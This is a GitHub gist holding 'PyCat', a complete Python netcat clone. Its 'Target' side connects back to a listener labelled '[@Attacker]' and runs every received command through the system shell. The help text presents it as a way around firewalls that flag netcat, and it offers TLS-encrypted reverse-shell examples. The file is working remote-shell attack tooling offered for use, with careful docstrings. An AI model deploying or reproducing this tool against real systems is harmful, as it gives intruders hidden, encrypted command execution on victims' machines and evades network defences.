Skip to content

Instantly share code, notes, and snippets.

@Ludisposed
Last active September 24, 2021 09:54
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save Ludisposed/233343f05b58b899ed72f29e937b05e5 to your computer and use it in GitHub Desktop.
Save Ludisposed/233343f05b58b899ed72f29e937b05e5 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
import argparse
import datetime
from functools import wraps
import socket
from ssl import wrap_socket, create_default_context, CERT_NONE
import sys
import subprocess
import tempfile
import os
import re
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import serialization, hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend
# Reply the client sends back when a built-in command (currently only
# ``cd <path>``) succeeds, so the listening side always receives some output.
SUCCESS_RESPONSE = b"Command successfully completed"
def ssl_server(func):
    """Decorate a server entry point so it runs on a bound, listening socket.

    The wrapper binds ``inst.socket`` to ``(inst.host, inst.port)`` and puts
    it into listening mode.  When ``inst.ssl`` is truthy it additionally
    generates a throw-away self-signed certificate through
    ``inst.generate_temp_cert()`` and replaces ``inst.socket`` with a TLS
    server socket, so that connections returned by ``accept()`` are encrypted.

    Args:
        func: The method to run once the socket is ready.  It is called as
            ``func(inst, *args)``.

    Returns:
        The wrapping function; it returns whatever *func* returns.
    """
    @wraps(func)
    def wrapper(inst, *args):
        inst.socket.bind((inst.host, inst.port))
        inst.socket.listen(0)
        if inst.ssl:
            # Imported locally so this function does not depend on which
            # names the file-level ``from ssl import ...`` line provides.
            from ssl import Purpose

            # Purpose.CLIENT_AUTH produces a *server-side* context; the
            # default purpose (SERVER_AUTH) is meant for client sockets.
            inst.context = create_default_context(Purpose.CLIENT_AUTH)
            inst.key, inst.cert = inst.generate_temp_cert()
            inst.context.load_cert_chain(certfile=inst.cert, keyfile=inst.key)
            # The module-level ssl.wrap_socket() is deprecated and was removed
            # in Python 3.12; SSLContext.wrap_socket() is its replacement.
            inst.socket = inst.context.wrap_socket(inst.socket, server_side=True)
        return func(inst, *args)
    return wrapper
def ssl_client(func):
    """Decorate a client entry point so it runs on a connected socket.

    The wrapper connects ``inst.socket`` to ``(inst.host, inst.port)``.  When
    ``inst.ssl`` is truthy the connected socket is then wrapped in TLS using
    a context with hostname checking and certificate verification disabled
    (the listening side presents a freshly generated self-signed
    certificate, so verification could not succeed).

    Args:
        func: The method to run once the connection is established.  It is
            called as ``func(inst, *args)``.

    Returns:
        The wrapping function; it returns whatever *func* returns.
    """
    @wraps(func)
    def wrapper(inst, *args):
        inst.socket.connect((inst.host, inst.port))
        if inst.ssl:
            inst.context = create_default_context()
            # check_hostname must be switched off before verify_mode may be
            # set to CERT_NONE.
            inst.context.check_hostname = False
            inst.context.verify_mode = CERT_NONE
            # Wrap through the configured context: the module-level
            # ssl.wrap_socket() ignored it and was removed in Python 3.12.
            inst.socket = inst.context.wrap_socket(inst.socket)
        return func(inst, *args)
    return wrapper
class PyCatBase():
    """State and helpers shared by the listening and connecting sides.

    Instances own one TCP socket and can be used as context managers; the
    socket is closed when the ``with`` block ends.
    """

    def __init__(self, **kwargs):
        """Create the TCP socket and store the connection settings.

        Keyword Args:
            port: Port number to bind or connect to.
            host: Host name or address; a falsy value selects ``"0.0.0.0"``.
            timeout: Timeout value stored for use by subclasses.
            ssl: Truthy when the connection should be wrapped in TLS.
        """
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.port = kwargs['port']
        self.host = kwargs['host'] or "0.0.0.0"
        self.timeout = kwargs['timeout']
        self.ssl = kwargs['ssl']
        # True when *this* process runs on Windows.
        self.is_windows = os.name == "nt"
        # Captures the argument of a ``cd`` command in group 1 (empty when
        # ``cd`` is given without a path).
        self.change_dir_regex = re.compile(r'cd(?:\s+|$)(.*)')

    def __enter__(self):
        """Return the instance itself for use in a ``with`` statement."""
        return self

    def __exit__(self, *args):
        """Close the socket; exceptions from the ``with`` body propagate."""
        self.socket.close()
        return False

    def exit(self):
        """Close the socket and terminate the process with status 0."""
        self.socket.close()
        sys.exit(0)

    def read(self, connection, length=1024):
        """Receive one message from *connection* and return it as text.

        Chunks of up to *length* bytes are received until a chunk shorter
        than *length* arrives (this includes the empty chunk produced when
        the peer has closed the connection).

        NOTE: a message whose size is an exact multiple of *length* causes
        one more blocking ``recv`` call; the protocol has no framing that
        would avoid this.

        Args:
            connection: Object with a socket-like ``recv(size)`` method.
            length: Maximum number of bytes requested per ``recv`` call.

        Returns:
            The received bytes decoded as UTF-8 with trailing whitespace
            removed.  Bytes that are not valid UTF-8 (for example console
            output in a legacy code page) are replaced with U+FFFD instead
            of raising ``UnicodeDecodeError``.
        """
        chunks = []
        while True:
            data = connection.recv(length)
            chunks.append(data)
            if len(data) < length:
                break
        return b"".join(chunks).decode("utf-8", errors="replace").rstrip()

    @staticmethod
    def generate_temp_cert():
        """Create a self-signed certificate and its RSA key in temp files.

        The key is a 2048-bit RSA key written unencrypted in PEM format; the
        certificate is valid for 365 days starting now and is signed with
        SHA-256.

        Returns:
            A ``(key_path, cert_path)`` tuple of file system paths.  The
            files are not deleted by this method.
        """
        name_attributes = [
            x509.NameAttribute(NameOID.COUNTRY_NAME, "OK"),
            x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, "OK"),
            x509.NameAttribute(NameOID.LOCALITY_NAME, "OK"),
            x509.NameAttribute(NameOID.ORGANIZATION_NAME, "OK"),
            x509.NameAttribute(NameOID.COMMON_NAME, "PyCat")
        ]
        key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048,
            backend=default_backend()
        )
        key_pem = key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.TraditionalOpenSSL,
            encryption_algorithm=serialization.NoEncryption()
        )

        # Self-signed: subject and issuer are the same name.
        subject = issuer = x509.Name(name_attributes)
        # Take the timestamp once so both validity bounds derive from the
        # same instant; timezone-aware replaces the deprecated utcnow().
        now = datetime.datetime.now(datetime.timezone.utc)
        cert = x509.CertificateBuilder()\
            .subject_name(subject)\
            .issuer_name(issuer)\
            .public_key(key.public_key())\
            .serial_number(x509.random_serial_number())\
            .not_valid_before(now)\
            .not_valid_after(now + datetime.timedelta(days=365))
        cert = cert.sign(key, hashes.SHA256(), default_backend())
        cert_pem = cert.public_bytes(serialization.Encoding.PEM)

        # mkstemp() returns an already-open descriptor; write through it so
        # it is closed instead of leaked.
        key_fd, key_path = tempfile.mkstemp()
        with os.fdopen(key_fd, "wb") as f:
            f.write(key_pem)
        cert_fd, cert_path = tempfile.mkstemp()
        with os.fdopen(cert_fd, "wb") as f:
            f.write(cert_pem)
        return key_path, cert_path
class PyCatServer(PyCatBase):
    """Listening side: accepts one connection and drives an interactive shell."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)

    def create_prompt_string(self):
        """Query the peer for its working directory, user and host name.

        Three commands are sent one after another and each reply is read
        before the next command is sent.

        NOTE(review): the working-directory command is chosen from
        ``self.is_windows``; if that flag describes the local machine rather
        than the peer, the wrong command is sent to a peer on another
        platform -- confirm.

        Returns:
            The prompt text shown before each command is read.
        """
        pwd_command = b"cd" if self.is_windows else b"pwd"
        # sendall() keeps writing until the whole command is transmitted;
        # plain send() may stop after a partial write.
        self.client.sendall(pwd_command)
        pwd = self.read(self.client)
        self.client.sendall(b"whoami")
        whoami = self.read(self.client)
        self.client.sendall(b"hostname")
        hostname = self.read(self.client)
        return f"{whoami}@{hostname} PyCat {pwd}\n$ "

    @ssl_server
    def main(self):
        """Wait for one incoming connection and start the command loop."""
        if self.timeout > 0:
            self.socket.settimeout(self.timeout)
        self.client, addr = self.socket.accept()
        print(f"[*] Incomming connection from {':'.join(map(str, addr))}")
        self.handle_client()

    def handle_client(self):
        """Read commands from the operator and relay them to the peer.

        The loop ends when the operator enters ``exit`` (which is still
        forwarded so the peer can shut down too); afterwards the process
        terminates through ``self.exit()``.
        """
        try:
            while True:
                prompt_string = self.create_prompt_string()
                command = input(prompt_string)
                if not command.strip():
                    # Nothing would be transmitted for a blank line, leaving
                    # both sides waiting on each other; just prompt again.
                    continue
                self.client.sendall(command.encode("utf-8"))
                if command == "exit":
                    break
                print(self.read(self.client))
        finally:
            # The accepted connection is a separate socket from the
            # listening one and must be closed explicitly.
            self.client.close()
        self.exit()
class PyCatClient(PyCatBase):
    """Connecting side: executes the commands it receives and returns output."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)

    def change_dir(self, path):
        """Change the process working directory to *path*.

        Returns:
            ``SUCCESS_RESPONSE`` on success, otherwise the UTF-8 encoded
            error message.  Every ``OSError`` is reported this way (missing
            path, not a directory, permission denied, ...), so a bad path
            never terminates the client.
        """
        try:
            os.chdir(path)
        except OSError as e:
            return str(e).encode("utf-8")
        return SUCCESS_RESPONSE

    def exec_command(self, command):
        """Run *command* through the system shell and return its output.

        Standard error is merged into standard output.

        NOTE: the command text comes from the remote peer and is executed
        with ``shell=True`` -- that is the purpose of this tool, but it
        means the peer has full shell access.

        Returns:
            The raw output bytes.  For a command that exits with a non-zero
            status the captured output is returned, or the exception text
            when nothing was captured.  Any other failure is reported as
            its UTF-8 encoded message.
        """
        try:
            return subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
        except subprocess.CalledProcessError as e:
            # Keep what the failed command printed; it usually explains why.
            return e.output or str(e).encode("utf-8")
        except Exception as e:
            # Deliberate catch-all: report the failure to the peer instead
            # of terminating the session.
            return str(e).encode("utf-8")

    def handle_command(self, command):
        """Dispatch one received command and return the reply bytes.

        ``exit`` terminates the process, ``cd <path>`` changes directory
        in-process (a shell ``cd`` would not outlive the subprocess), and
        everything else -- including a bare ``cd`` -- goes to the shell.
        """
        if command == "exit":
            self.exit()
        change_dir = self.change_dir_regex.match(command)
        if change_dir and change_dir.group(1):
            return self.change_dir(change_dir.group(1))
        return self.exec_command(command)

    @ssl_client
    def main(self):
        """Serve commands from the connected peer until it disconnects."""
        if self.timeout > 0:
            self.socket.settimeout(self.timeout)
        while True:
            cmd = self.read(self.socket)
            if not cmd:
                # An empty read means the peer closed the connection;
                # looping on would spin forever running empty commands.
                break
            response = self.handle_command(cmd)
            # Always answer: the peer blocks until it receives something,
            # so a command without output is acknowledged with a newline.
            self.socket.sendall(response or b"\n")
def parse_arguments(argv=None):
    """Parse and validate the command-line options.

    Args:
        argv: Optional list of argument strings.  ``None`` (the default)
            makes argparse read ``sys.argv[1:]``.

    Returns:
        The populated ``argparse.Namespace`` with the attributes ``listen``,
        ``ssl``, ``port``, ``host`` and ``timeout``.

    Raises:
        SystemExit: Via ``parser.error`` when neither ``--listen`` nor
            ``--host`` is given, or when the port is missing or outside
            1-65535.
    """
    parser = argparse.ArgumentParser(usage='%(prog)s [options]',
                                     description='PyCat by @Ludisposed',
                                     formatter_class=argparse.RawDescriptionHelpFormatter,
                                     epilog=r'''
This is a tiny implementation of nc in Python3.6+
nc is often flagged by firewalls...
but now you can (really) teach your colleagues to lock their workstations! >:)
Features
- SSL encryption
- Multi platform
- Persistent shell
PyCat Commands
- exit
- cd {path}
- (TODO upload/download files)
Examples:
[Encrypted shell]
./pycat.py -lsp 443 [@Attacker]
./pycat.py -si localhost -p 443 [@Target]
[Not Encrypted shell]
./pycat.py -lp 8080 [@Attacker]
./pycat.py -i localhost -p 8080 [@Target]
Example output
$ ./pycat.py -lsp 443
[*] Incomming connection from 127.0.0.1:62135
username@hostname PyCat C:\PyCat\
$ echo hooooi
hooooi
$ cd ../
Command successfully completed
username@hostname PyCat C:\
$ exit
''')
    parser.add_argument('-l', '--listen', action="store_true", help='Spawns server, and listens for incomming connections')
    parser.add_argument('-s', '--ssl', action="store_true", help='Encrypt connection with SSL')
    parser.add_argument('-p', '--port', type=int, help='Port to listen/connect on')
    parser.add_argument('-i', '--host', type=str, help='Host to connect to')
    parser.add_argument('-t', '--timeout', type=int, default=0, help='Add timeout in seconds')
    args = parser.parse_args(argv)

    # A mode must be chosen first; the port checks only make sense after it.
    if not args.listen and not args.host:
        parser.error('Specify --listen or --host')
    if args.port is None:
        parser.error('Specify which port to connect to')
    if not 0 < args.port < 65536:
        # Reject early instead of failing later inside bind()/connect().
        parser.error('Port must be between 1 and 65535')
    return args
if __name__ == '__main__':
    # Script entry point: listen when --listen was given, otherwise connect.
    cli_args = parse_arguments()
    if cli_args.listen:
        runner_class = PyCatServer
    else:
        runner_class = PyCatClient
    # The instance is its own context manager, so its socket is closed when
    # the block ends, however main() finishes.
    with runner_class(**vars(cli_args)) as runner:
        runner.main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment